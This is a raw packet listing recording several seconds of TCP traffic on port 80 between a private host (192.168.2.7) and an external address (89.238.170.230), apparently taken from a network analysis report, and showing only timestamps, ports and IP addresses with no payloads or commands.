Mar 29, 2024 14:25:14.070276976 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.070322990 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.070353985 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.070374966 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.113766909 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.113811016 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.113850117 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.113873959 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.279176950 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.279234886 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.279293060 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.279319048 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.279351950 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.279401064 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.279417992 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.279463053 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.297383070 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.297398090 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.297446966 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.297466040 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.503865957 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.503881931 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.503911972 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.503915071 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.503945112 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.503957033 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.503959894 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.503992081 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.504245043 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.504277945 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.504334927 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.504365921 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.518656969 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.518745899 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.716464043 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.716536045 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.716674089 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.716674089 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.717236996 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.717292070 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.728297949 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.728332043 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.728344917 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.728401899 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.728445053 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.728445053 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.728445053 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.731512070 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.947458982 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.947475910 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.947488070 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.947660923 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.947660923 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.957896948 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.957973003 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.958142996 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.958183050 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.958194017 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.958225012 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.960884094 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.960896969 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.960939884 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:15.168159962 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:15.168266058 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:15.168314934 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:15.168385983 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:15.177753925 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:15.177860022 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:15.178119898 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:15.178134918 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:15.178222895 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:15.180614948 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:15.180629015 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:15.180692911 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:15.378325939 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:15.378415108 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:15.387449026 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:15.387496948 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:15.387511969 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:15.387526989 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:15.387564898 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:15.387603045 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:15.390326023 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:15.390413046 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:15.586127043 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:15.586297989 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:15.594382048 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:15.594417095 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:15.594472885 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:15.594497919 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:15.596195936 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:15.596211910 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:15.596240044 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:15.596260071 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:15.798186064 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:15.798202991 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:15.798284054 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:15.805882931 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:15.805938005 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:15.806793928 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:15.806838036 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:15.806929111 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:15.806974888 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:15.807009935 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:15.807054996 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.001957893 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.001975060 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.002034903 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.002064943 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.009130001 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.009149075 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.009185076 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.009212017 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.009927034 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.009972095 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.009979010 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.010015965 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.010056019 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.010096073 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.197793961 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.197813988 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.197858095 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.197876930 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.197881937 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.197917938 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.204374075 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.204457045 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.205177069 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.205225945 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.205296993 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.205341101 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.205420017 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.205466986 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.205466986 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.205502987 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.408268929 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.408380985 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.408446074 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.408457994 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.408513069 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.408749104 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.415220022 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.415293932 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.416083097 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.416096926 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.416131020 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.416147947 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.416327000 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.416340113 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.416376114 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.416392088 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.619705915 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.619870901 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.619909048 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.619915962 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.619949102 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.619949102 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.626789093 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.626874924 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.627562046 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.627576113 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.627604961 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.627629042 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.627809048 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.627821922 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.627856016 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.627881050 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.845679045 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.845693111 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.845757008 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.845778942 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.845818996 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.851149082 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.851198912 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:16.851799011 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.851814032 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.851917982 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.851931095 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:16.851995945 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.070615053 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.070677042 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.070739031 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.070766926 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.076225042 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.076276064 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.076283932 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.076324940 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.076946020 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.076992035 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.077038050 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.077080965 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.077100039 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.077141047 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.077158928 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.077197075 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.292133093 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.292211056 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.296613932 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.296654940 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.296662092 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.296696901 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.297292948 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.297343016 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.297409058 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.297451019 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.297612906 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.297651052 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.297679901 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.297734976 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.297976017 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.298022032 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.504658937 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.504731894 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.504755974 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.504798889 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.509851933 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.509905100 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.510739088 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.510778904 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.510785103 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.510824919 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.510991096 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.511032104 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.511079073 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.511121035 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.511679888 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.511727095 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.511935949 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.511979103 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.714484930 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.714620113 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.719341993 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.719358921 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.719422102 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.720072985 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.720094919 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.720123053 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.720151901 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.720453024 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.720490932 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.720536947 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.720577955 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.721096039 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.721127987 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.721137047 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.721164942 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.921624899 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.921705008 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.921704054 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.921741962 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.925935984 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.925961971 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.925981998 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.926000118 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.926676989 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.926717043 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.926753044 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.926788092 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.926939964 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.926970959 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.927037001 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.927068949 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.927577972 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.927611113 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:17.927614927 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:17.927647114 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:18.149101019 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.149327993 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:18.154006958 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.154022932 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.154139042 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:18.154990911 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.155101061 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:18.157376051 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.157413006 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.157430887 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.157444954 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.157468081 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:18.157489061 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.157586098 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:18.376266003 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.376285076 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.376455069 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:18.379259109 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.379334927 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.379343033 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:18.379441977 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:18.382607937 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.382649899 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:18.382710934 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.382752895 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:18.382817984 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.382877111 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:18.594425917 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.594443083 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.594674110 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:18.595688105 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.595781088 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:18.595841885 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.595911026 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:18.598098993 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.598177910 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:18.598419905 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.598433018 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.598505020 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:18.804862976 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.804887056 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.805015087 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:18.806909084 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.806962967 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:18.807030916 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.807080030 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:18.809305906 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.809354067 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:18.809412003 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.809458017 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:18.809916973 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.809962988 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:18.810003042 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:18.810048103 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:19.025813103 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:19.025859118 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:19.025870085 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:19.025904894 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:19.027146101 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:19.027178049 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:19.027199984 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:19.027213097 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:19.029274940 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:19.029320002 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:19.029337883 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:19.029361010 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:19.029776096 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:19.029820919 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:19.029875040 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:19.029925108 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:19.251514912 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:19.251594067 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:19.251631021 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:19.251679897 CET	49699	80	192.168.2.7	89.238.170.230
